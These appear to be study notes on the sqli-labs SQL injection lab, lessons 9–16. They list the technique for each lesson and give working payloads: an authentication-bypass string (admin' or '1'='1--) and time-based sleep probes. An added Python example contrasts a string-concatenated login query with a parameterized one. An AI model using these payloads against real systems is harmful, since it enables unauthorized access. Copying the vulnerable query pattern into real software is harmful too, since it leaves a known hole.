sqli-labs challenge mini-game (less9-16)
Same as 1-8
less-9
get -blind -time based -single quotes
Whatever value is entered in the URL, the page returns the same response.
' and sleep()--+ (if())
less-10
get -blind -time based -double quotes
less-11
post -error based -single quotes -string
" and sleep()
Universal password: admin' or '1'='1-- (tip: the comment marker is # or -- (with a trailing space))
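An added example, not part of the original notes: the less-11 login pattern (string value inside single quotes) rebuilt in Python with an in-memory SQLite database as a stand-in for the lab's PHP/MySQL, beside the parameterized form that treats the same input as data. The table, function names and sample credentials are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample rows standing in for the lab's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret-admin"), ("o'brien", "pw")])
    return db

def login_concat(db, uname, passwd):
    # Vulnerable pattern: POST values pasted between single quotes, so a
    # quote inside uname ends the string literal and the remainder of the
    # input is parsed as part of the WHERE clause.
    sql = ("SELECT username FROM users WHERE username='" + uname +
           "' AND password='" + passwd + "' LIMIT 1")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        # A stray quote produces a syntax error; an application that shows
        # this error to the client is what "error based" refers to.
        return None
    return row[0] if row else None

def login_param(db, uname, passwd):
    # Hardened form: placeholders bind both values as data, never as SQL.
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=? LIMIT 1",
        (uname, passwd)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    note_input = "admin' or '1'='1-- "   # the string from the note above
    for fn in (login_concat, login_param):
        print(fn.__name__,
              "| note input + wrong password:", fn(db, note_input, "wrong"),
              "| legitimate o'brien login:", fn(db, "o'brien", "pw"))
```

The concatenated version accepts the note's input with a wrong password and also breaks for a legitimate user whose name contains an apostrophe; the parameterized version rejects the first and handles the second.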
less-12
post -error based -double quotes -string -with twist

less-13
post -double injection -single quotes -string -with twist

count(*), group by, floor(), rand()
less-14
post -double injection -double quotes -string

less-15
post -blind -boolian/time based -single quotes
admin' and sleep(3)-- (the page is displayed after 3 seconds, with no echoed content)

less-16
post -blind -boolian/time based -double quotes
